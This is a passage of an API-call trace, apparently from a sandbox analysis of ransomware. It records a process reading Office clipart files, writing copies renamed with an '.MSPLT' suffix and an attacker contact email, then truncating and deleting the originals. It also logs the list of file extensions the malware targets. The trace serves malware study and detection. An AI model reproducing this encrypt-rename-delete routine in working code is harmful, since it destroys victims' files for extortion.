lpString2=".MID") returned -1 [0319.914] lstrlenW (lpString=".docx") returned 5 [0319.914] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0319.914] lstrlenW (lpString=".pdf") returned 4 [0319.914] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.914] lstrlenW (lpString=".xls") returned 4 [0319.914] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.914] lstrlenW (lpString=".xlsx") returned 5 [0319.914] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0319.914] lstrlenW (lpString=".ppt") returned 4 [0319.914] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.914] lstrlenW (lpString=".zip") returned 4 [0319.914] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.914] lstrlenW (lpString=".rar") returned 4 [0319.914] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.914] lstrlenW (lpString=".bz2") returned 4 [0319.914] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.914] lstrlenW (lpString=".7z") returned 3 [0319.914] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.914] lstrlenW (lpString=".dbf") returned 4 [0319.914] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.914] lstrlenW (lpString=".1cd") returned 4 [0319.914] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.914] lstrlenW (lpString=".jpg") returned 4 [0319.914] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.915] lstrlenW (lpString=".doc") returned 4 [0319.915] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.915] lstrlenW (lpString=".docx") returned 5 [0319.915] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0319.915] lstrlenW (lpString=".pdf") returned 4 [0319.915] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.915] lstrlenW (lpString=".xls") returned 4 [0319.915] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.915] lstrlenW (lpString=".xlsx") returned 5 [0319.915] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0319.915] lstrlenW (lpString=".ppt") returned 4 [0319.915] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.915] lstrlenW (lpString=".zip") returned 4 [0319.915] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.915] lstrlenW (lpString=".rar") returned 4 [0319.915] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.915] lstrlenW (lpString=".bz2") returned 4 [0319.915] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.915] lstrlenW (lpString=".7z") returned 3 [0319.915] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.915] lstrlenW (lpString=".dbf") returned 4 [0319.915] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.915] lstrlenW (lpString=".1cd") returned 4 [0319.915] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 68 [0319.915] lstrlenW (lpString=".jpg") returned 4 [0319.915] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.916] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.916] lstrlenW (lpString="OCEAN_01.MID") returned 12 [0319.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0319.916] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=5440) returned 1 [0319.916] CloseHandle (hObject=0x348) returned 1 [0319.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid")) returned 0x220 [0319.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0319.917] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.917] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0319.918] GetLastError () returned 0x0 [0319.918] ReadFile (in: hFile=0x348, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x1540, lpOverlapped=0x0) returned 1 [0320.102] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x1550, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x1550, lpOverlapped=0x0) returned 1 [0320.104] ReadFile (in: hFile=0x348, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.104] WriteFile (in: hFile=0x438, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.104] SetEndOfFile (hFile=0x438) returned 1 [0320.104] CloseHandle (hObject=0x438) returned 1 [0320.104] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.105] SetEndOfFile (hFile=0x348) returned 1 [0320.108] CloseHandle (hObject=0x348) returned 1 [0320.108] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.109] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid")) returned 1 [0320.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.110] lstrlenW (lpString=".doc") returned 4 [0320.110] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.110] lstrlenW (lpString=".docx") returned 5 [0320.110] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0320.110] lstrlenW (lpString=".pdf") returned 4 [0320.110] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.110] lstrlenW (lpString=".xls") returned 4 [0320.110] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.110] lstrlenW (lpString=".xlsx") returned 5 [0320.110] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0320.110] lstrlenW (lpString=".ppt") returned 4 [0320.110] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.110] lstrlenW (lpString=".zip") returned 4 [0320.110] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.110] lstrlenW (lpString=".rar") returned 4 [0320.110] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.110] lstrlenW (lpString=".bz2") returned 4 [0320.110] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.110] lstrlenW (lpString=".7z") returned 3 [0320.111] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.111] lstrlenW (lpString=".dbf") returned 4 [0320.111] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.111] lstrlenW (lpString=".1cd") returned 4 [0320.111] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.111] lstrlenW (lpString=".jpg") returned 4 [0320.111] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.111] lstrlenW (lpString=".doc") returned 4 [0320.111] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.111] lstrlenW (lpString=".docx") returned 5 [0320.111] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0320.111] lstrlenW (lpString=".pdf") returned 4 [0320.111] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.111] lstrlenW (lpString=".xls") returned 4 [0320.111] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.111] lstrlenW (lpString=".xlsx") returned 5 [0320.111] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0320.111] lstrlenW (lpString=".ppt") returned 4 [0320.111] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.111] lstrlenW (lpString=".zip") returned 4 [0320.112] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.112] lstrlenW (lpString=".rar") returned 4 [0320.112] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.112] lstrlenW (lpString=".bz2") returned 4 [0320.112] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.112] lstrlenW (lpString=".7z") returned 3 [0320.112] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.112] lstrlenW (lpString=".dbf") returned 4 [0320.112] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.112] lstrlenW (lpString=".1cd") returned 4 [0320.112] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 68 [0320.112] lstrlenW (lpString=".jpg") returned 4 [0320.112] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.113] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.113] lstrlenW (lpString="PARNT_01.MID") returned 12 [0320.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x560 [0320.291] GetFileSizeEx (in: hFile=0x560, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=6491) returned 1 [0320.291] CloseHandle (hObject=0x560) returned 1 [0320.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid")) returned 0x220 [0320.292] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x560 [0320.292] SetFilePointerEx (in: hFile=0x560, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.292] SetFilePointerEx (in: hFile=0x560, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0320.294] GetLastError () returned 0x0 [0320.294] ReadFile (in: hFile=0x560, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x195b, lpOverlapped=0x0) returned 1 [0320.296] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x1960, lpOverlapped=0x0) returned 1 [0320.299] ReadFile (in: hFile=0x560, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.299] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.299] SetEndOfFile (hFile=0x420) returned 1 [0320.299] CloseHandle (hObject=0x420) returned 1 [0320.300] SetFilePointerEx (in: hFile=0x560, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.300] SetEndOfFile (hFile=0x560) returned 1 [0320.305] CloseHandle (hObject=0x560) returned 1 [0320.305] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.306] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid")) returned 1 [0320.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.307] lstrlenW (lpString=".doc") returned 4 [0320.307] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.307] lstrlenW (lpString=".docx") returned 5 [0320.307] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0320.307] lstrlenW (lpString=".pdf") returned 4 [0320.307] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.307] lstrlenW (lpString=".xls") returned 4 [0320.307] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.307] lstrlenW (lpString=".xlsx") returned 5 [0320.307] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0320.307] lstrlenW (lpString=".ppt") returned 4 [0320.307] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.307] lstrlenW (lpString=".zip") returned 4 [0320.307] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.307] lstrlenW (lpString=".rar") returned 4 [0320.307] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.307] lstrlenW (lpString=".bz2") returned 4 [0320.307] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.307] lstrlenW (lpString=".7z") returned 3 [0320.307] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.307] lstrlenW (lpString=".dbf") returned 4 [0320.308] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.308] lstrlenW (lpString=".1cd") returned 4 [0320.308] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.308] lstrlenW (lpString=".jpg") returned 4 [0320.308] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.308] lstrlenW (lpString=".doc") returned 4 [0320.308] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.308] lstrlenW (lpString=".docx") returned 5 [0320.308] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0320.308] lstrlenW (lpString=".pdf") returned 4 [0320.308] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.308] lstrlenW (lpString=".xls") returned 4 [0320.308] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.308] lstrlenW (lpString=".xlsx") returned 5 [0320.308] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0320.308] lstrlenW (lpString=".ppt") returned 4 [0320.308] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.308] lstrlenW (lpString=".zip") returned 4 [0320.309] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.309] lstrlenW (lpString=".rar") returned 4 [0320.309] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.309] lstrlenW (lpString=".bz2") returned 4 [0320.309] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.309] lstrlenW (lpString=".7z") returned 3 [0320.309] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.309] lstrlenW (lpString=".dbf") returned 4 [0320.309] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.309] lstrlenW (lpString=".1cd") returned 4 [0320.309] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 68 [0320.309] lstrlenW (lpString=".jpg") returned 4 [0320.309] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.309] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.309] lstrlenW (lpString="PARNT_02.MID") returned 12 [0320.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0320.397] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=5714) returned 1 [0320.397] CloseHandle (hObject=0x3b0) returned 1 [0320.397] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid")) returned 0x220 [0320.400] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0320.401] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.401] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x560 [0320.402] GetLastError () returned 0x0 [0320.402] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x1652, lpOverlapped=0x0) returned 1 [0320.404] WriteFile (in: hFile=0x560, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x1660, lpOverlapped=0x0) returned 1 [0320.405] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.406] WriteFile (in: hFile=0x560, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.406] SetEndOfFile (hFile=0x560) returned 1 [0320.406] CloseHandle (hObject=0x560) returned 1 [0320.406] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.406] SetEndOfFile (hFile=0x3b0) returned 1 [0320.410] CloseHandle (hObject=0x3b0) returned 1 [0320.410] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.411] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid")) returned 1 [0320.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.412] lstrlenW (lpString=".doc") returned 4 [0320.412] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.412] lstrlenW (lpString=".docx") returned 5 [0320.412] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0320.412] lstrlenW (lpString=".pdf") returned 4 [0320.412] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.412] lstrlenW (lpString=".xls") returned 4 [0320.412] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.412] lstrlenW (lpString=".xlsx") returned 5 [0320.412] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0320.412] lstrlenW (lpString=".ppt") returned 4 [0320.412] lstrcmpiW 